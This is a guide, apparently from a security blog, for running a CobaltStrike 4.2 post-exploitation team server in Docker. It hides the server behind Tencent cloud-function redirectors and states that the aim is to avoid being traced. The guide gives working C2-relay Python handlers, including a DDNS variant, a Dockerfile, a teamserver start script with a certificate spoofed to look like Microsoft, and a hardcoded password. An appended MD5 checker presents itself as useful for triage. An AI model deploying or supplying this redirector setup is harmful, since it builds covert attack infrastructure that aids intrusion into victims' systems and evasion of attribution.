CobaltStrike 4.2 Cloud function and Docker

Introduction

CobaltStrike is a cross-platform, multi-operator post-exploitation framework written in Java. It integrates port forwarding, port scanning, SOCKS proxying, privilege escalation, phishing, remote-access trojans and other functions; the tool covers almost every technical stage of an APT attack chain.
Use a cloud function to avoid being traced back
Use a Docker container, which is quick and convenient
Use the Python script I wrote to avoid accidental leaks

Quick start

Amd64

If you want to use cloud functions, you must use port 443 inside the container

docker run -it \
--rm \
-e passwd="e9PrFYtrPFD2U" \
-e server_ip="1.1.1.1?" \
-e server_port=94831? \
-e dname="CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US" \
-p 94831?:94831? \
-p 94831?:94831?/udp \
-p 33009?:443 \
-p 33009?:443/udp \
registry.cn-hangzhou.aliyuncs.com/xrsec/cobaltstrike:4.2-tgb
# xrsec/cobaltstrike:4.2-tgb

Arm64

If you want to use cloud functions, you must use port 443 inside the container

docker run -it \
--rm \
-e passwd="e9PrFYtrPFD2U" \
-e server_ip="1.1.1.1?" \
-e server_port=94831? \
-e dname="CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US" \
-p 94831?:94831? \
-p 94831?:94831?/udp \
-p 33009?:443 \
-p 33009?:443/udp \
registry.cn-hangzhou.aliyuncs.com/xrsec/cobaltstrike:Arm-4.2-tgb
# xrsec/cobaltstrike:Arm-4.2-tgb

Basic information

Ports 80/443 are not required here. How it works: the cloud function forwards data to the port you specify, and that port forwards the data on to the Docker container's 443/80 port, so 80/443 never have to be exposed directly.

Cloud Function service ==> Create ==> Custom create (function name / region as you like, Python 3.6, custom trigger, version: $LATEST,
for the function code use the script below, tweak it and it still works!, API Gateway trigger, everything else default, tick "integrated response"; Base64: please help me test it) ==>
Done ==> API Gateway ==> Services ==> click the API you created ==> General API ==> click Edit ==> Path (set it to /) ==> Finish
Cloud Function service ==> click the API service you created ==> Trigger management ==> Access path ==> (when accessing the CS URL you do not need the trailing path)

vps

# -*- coding: utf8 -*-
import base64
import requests


def main_handler(event, context):
    # Upstream address: fill in your IP. If your port is 80 or 443, remove the
    # ':port' part entirely; otherwise keep it, e.g. ':18888'.
    C2 = 'https://' + 'Fill in your IP address here' + ':18888'
    path = event['path']
    ip = event['requestContext']['sourceIp']
    headers = event['headers']
    # Pass the real client address through to the upstream server.
    headers['X-Forwarded-For'] = ip
    print("############")
    print("############")
    print("############")
    print("############")
    print("############")
    print("############")
    try:
        if event['httpMethod'] == 'GET':
            resp = requests.get(C2 + path, headers=headers, verify=False)
            print("############")
            print("############")
            print("############")
            print("############")
            print("############")
            print("############")
        else:
            print("############")
            print("############")
            print("############")
            print("############")
            print("############")
            print("############")
            resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)
    except Exception:
        print("腾讯云蜘蛛抓取异常,请检查json数据接口")
        # or print("Tencent cloud spider crawling exception, please check the JSON data interface")
        print("############")
        print("############")
        print("############")
        print("############")
        print("############")
        print("############")
        # The upstream request failed, so there is no resp to relay back.
        return {"isBase64Encoded": False, "statusCode": 502, "headers": {}, "body": "upstream request failed"}
    # API Gateway "integrated response" layout: the body is base64 so binary content survives.
    response = {
        "isBase64Encoded": True,
        "statusCode": resp.status_code,
        "headers": dict(resp.headers),
        "body": base64.b64encode(resp.content).decode('ascii')
    }
    return response


Dynamic DNS(DDNS)

# -*- coding: utf8 -*-
import base64
import requests


def main_handler(event, context):
    domain = "Fill in your domain name here"
    # Do not format or delete comments
    # Young man, don't reformat this and don't delete my comments, thanks 🙏
    print("############")
    print("############")
    print("############")
    print("############")
    print("############")
    # If you use another DNS service, adapt the parsing below to its own response format
    web_status = requests.get("https://myssl.com/api/v1/tools/dns_query?qtype=1&host=%s&qmode=1" % domain,
                              verify=False, timeout=5)
    print("############")
    print("############")
    print("############")
    print("############")
    print("############")
    try:
        # First A record for the domain, in the myssl.com response layout
        myip = (web_status.json()["data"])["86"][0]["answer"]["records"][0]["value"]
        print("############")
        print("############")
        print("############")
        print("############")
        print("############")
    except (KeyError, IndexError, TypeError, ValueError):
        # No record came back (records is null) or the response shape changed:
        # abort here instead of dereferencing records[0] a second time.
        print("Domain name wrong")
        print("############")
        print("############")
        print("############")
        print("############")
        print("############")
        print("############")
        return {"isBase64Encoded": False, "statusCode": 502, "headers": {}, "body": "DNS lookup failed"}
    print("############")
    print("############")
    print("############")
    print("############")
    print("############")
    print("############")
    C2 = 'https://' + myip + ':13003'
    path = event['path']
    ip = event['requestContext']['sourceIp']
    headers = event['headers']
    # Pass the real client address through to the upstream server.
    headers['X-Forwarded-For'] = ip
    print("############")
    print("############")
    print("############")
    print("############")
    print("############")
    print("############")
    try:
        if event['httpMethod'] == 'GET':
            resp = requests.get(C2 + path, headers=headers, verify=False)
            print("############")
            print("############")
            print("############")
            print("############")
            print("############")
            print("############")
        else:
            print("############")
            print("############")
            print("############")
            print("############")
            print("############")
            print("############")
            resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)
    except Exception:
        print("腾讯云蜘蛛抓取异常,请检查json数据接口")
        # or print("Tencent cloud spider crawling exception, please check the JSON data interface")
        print("############")
        print("############")
        print("############")
        print("############")
        print("############")
        print("############")
        # The upstream request failed, so there is no resp to relay back.
        return {"isBase64Encoded": False, "statusCode": 502, "headers": {}, "body": "upstream request failed"}
    # API Gateway "integrated response" layout: the body is base64 so binary content survives.
    response = {
        "isBase64Encoded": True,
        "statusCode": resp.status_code,
        "headers": dict(resp.headers),
        "body": base64.b64encode(resp.content).decode('ascii')
    }
    return response


Tree

MD5 hashes are listed at the end of this page; if you want to build the image yourself, have these files ready

.
|-- CobaltStrike
| |-- cobaltstrike.auth
| |-- CobaltStrike.jar
| |-- cs.profile
| |-- Main.java
| |-- readme.txt
| |-- start
| |-- teamserver
| |-- third-party
| | |-- README.winvnc.txt
| | |-- winvnc.x64.dll
| | `-- winvnc.x86.dll
| |-- update
| `-- update.jar
|-- cs.tar
`-- Dockerfile

Dockerfile

FROM centos:latest

COPY CobaltStrike /CobaltStrike
COPY Dockerfile /CobaltStrike

RUN yum update -y \
&& yum upgrade -y \
&& yum install wget vim curl nc ncurses -y \
&& wget -O /tmp/jdk-16_linux-x64_bin.rpm https://download.oracle.com/otn-pub/java/jdk/16+36/7863447f0ab643c585b9bdebf67c69db/jdk-16_linux-x64_bin.rpm?AuthParam=1618677469_64467fc21b22b64b529fbba6a4d6f2ca \
&& rpm -ivh /tmp/jdk-16_linux-x64_bin.rpm \
&& rm /tmp/jdk-16_linux-x64_bin.rpm \
&& chmod 777 /CobaltStrike/teamserver

ENV server_ip 127.0.0.1
ENV server_port 50050
ENV aliasname "Bing Wallpaper"
ENV dname "CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US"
STOPSIGNAL SIGWINCH

EXPOSE 50050
CMD ["/CobaltStrike/teamserver"]

teamserver

#!/bin/bash
#
# Start Cobalt Strike Team Server
#

# make pretty looking messages (thanks Carlos)

#################

clear
echo -e "\033[1;31m _____ _ _ _ _____ _ _ _ \033[0m"
echo -e "\033[1;32m / __ \ | | | || | / ___|| | (_)| | \033[0m"
echo -e "\033[1;33m | / \/ ___ | |__ __ _ | || |_ \ \`--. | |_ _ __ _ | | __ ___ \033[0m"
echo -e "\033[1;34m | | / _ \ | '_ \ / _\` || || __| \`--. \| __|| '__|| || |/ / / _ \ \033[0m"
echo -e "\033[1;35m | \__/\| (_) || |_) || (_| || || |_ /\__/ /| |_ | | | || < | __/ \033[0m"
echo -e "\033[1;36m \____/ \___/ |_.__/ \__,_||_| \__|\____/ \__||_| |_||_|\_\ \___| \033[0m"
echo -e "\033[1;34m -------------- \033[0m"
echo -e "\033[1;31m __ __ ____ \033[0m"
echo -e "\033[1;32m \ \/ / | _ \ ___ ___ ___ \033[0m"
echo -e "\033[1;33m \ / | |_) | / __| / _ \ / __| \033[0m"
echo -e "\033[1;34m / \ | _ < \__ \ | __/ | (__ \033[0m"
echo -e "\033[1;35m /_/\_\ |_| \_\ |___/ \___| \___| \n\033[0m"
echo -e "\033[1;34m -------------- \033[0m"
echo -e "\033[1;31m __ __ _____ _____ _____ \033[0m"
echo -e "\033[1;32m \ \ / / / ____| | __ \ / ____| \033[0m"
echo -e "\033[1;33m \ \ /\ / / | | __ | |__) | | (___ ___ ___ \033[0m"
echo -e "\033[1;34m \ \/ \/ / | | |_ | | ___/ \___ \ / _ \ / __| \033[0m"
echo -e "\033[1;35m \ /\ / | |__| | | | ____) | | __/ | (__ \033[0m"
echo -e "\033[1;36m \/ \/ \_____| |_| |_____/ \___| \___| \n\033[0m"
echo -e "\033[1;31m\tThank's 北美第一突破手 && WgpSec \n\033[0m"
echo -e "\033[1;32m\t[ help ] \n\033[0m"
echo -e "\033[1;35m\t[ https://github.com/wgpsec ] \033[0m"
echo -e "\033[1;34m\t[ https://mp.weixin.qq.com/s/6nBrRJHFFpCw4N90n8aURA ] \033[0m"
echo -e "\033[1;33m\t[ https://blog.zygd.site/CobaltStrike%204.2%20Cloud%20function%20and%20Docker.html ] \n\033[0m"



#################

function print_good () {
    echo -e "\x1B[01;32m[+]\x1B[0m $1"
}

function print_error () {
    echo -e "\x1B[01;31m[-]\x1B[0m $1"
}

function print_info () {
    echo -e "\x1B[01;34m[*]\x1B[0m $1"
}

# check that we're r00t
if [ $UID -ne 0 ]; then
    print_error "Superuser privileges are required to run the team server"
    exit
fi

# check if java is available...
if [ $(command -v java) ]; then
    true
else
    print_error "java is not in \$PATH"
    echo "    is Java installed?"
    exit
fi

# check if keytool is available...
if [ $(command -v keytool) ]; then
    true
else
    print_error "keytool is not in \$PATH"
    echo "    install the Java Developer Kit"
    exit
fi

# generate a certificate
# naturally you're welcome to replace this step with your own permanent certificate.
# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
# is printed so users may have a chance to verify they're not being owned.
if [ -e /CobaltStrike/cobaltstrike.store ]; then
    print_info "Will use existing X509 certificate and keystore (for SSL)"
else
    print_info "Generating X509 certificate and keystore (for SSL)"
    IFS_BACKUP=$IFS
    IFS=$(echo -en "\n\b")
    keytool -keystore /CobaltStrike/cobaltstrike.store -storepass $passwd -keypass $passwd -genkey -keyalg RSA -alias "$aliasname" -dname "$dname"
    IFS=$IFS_BACKUP
fi

# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=$server_port -Djavax.net.ssl.keyStore=/CobaltStrike/cobaltstrike.store -Djavax.net.ssl.keyStorePassword=$passwd -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath /CobaltStrike/CobaltStrike.jar server.TeamServer $server_ip $passwd /CobaltStrike/cs.profile



MD5

0ce2f55444e4793516b5afe967be9255  CobaltStrike.jar
e6816d52fdc288de669d18e824262787  CobaltStrike/teamserver
077e75003bb749ecf240685e8f3c6cf9  cobaltstrike.auth
082182cf2f4b2c6ccdd9f2ae41350a1b  cs.profile
# The Java download link changes over time, so the Dockerfile hash is not the same for every build
# On Arm
35403e17d4a7eae15a1a4482b1ed841c  Dockerfile
# On Amd
c9fcc45150176c6e097f29934a05b7f7  Dockerfile
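A small checker for the manifest above, added here as an example and not part of the project: it parses the hash lines (accepting either Dockerfile digest, since one is listed per architecture), verifies a set of files against them, and reports missing or unlisted ones. The same routine lets a responder compare a recovered CobaltStrike.jar or cs.profile against these known digests during triage; file contents passed to verify() are constructed in the test.

```python
import hashlib
import re

# Manifest copied from the MD5 section of this page. Comment lines are kept;
# the Dockerfile is listed twice because its hash differs per architecture.
MANIFEST = """\
0ce2f55444e4793516b5afe967be9255  CobaltStrike.jar
e6816d52fdc288de669d18e824262787  CobaltStrike/teamserver
077e75003bb749ecf240685e8f3c6cf9  cobaltstrike.auth
082182cf2f4b2c6ccdd9f2ae41350a1b  cs.profile
# On Arm
35403e17d4a7eae15a1a4482b1ed841c  Dockerfile
# On Amd
c9fcc45150176c6e097f29934a05b7f7  Dockerfile
"""

LINE_RE = re.compile(r"^([0-9a-fA-F]{32})\s+(\S.*?)\s*$")


def parse_manifest(text):
    """Map each file name to the set of MD5 digests accepted for it.
    A name listed more than once (Dockerfile above) accepts any of them."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError("malformed manifest line: %r" % line)
        expected.setdefault(m.group(2), set()).add(m.group(1).lower())
    return expected


def verify(expected, files):
    """files maps name -> bytes (read them from disk in real use).
    Returns name -> 'ok' | 'mismatch' | 'missing' | 'unlisted'."""
    result = {}
    for name, digests in expected.items():
        if name not in files:
            result[name] = "missing"
        else:
            actual = hashlib.md5(files[name]).hexdigest()
            result[name] = "ok" if actual in digests else "mismatch"
    for name in files:
        if name not in expected:
            result[name] = "unlisted"
    return result
```

In real use, read each file in the Tree section into the dict by its manifest name and treat any "mismatch" as a reason not to build or run the image.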

Thanks

北美第一突破手 && WgpSec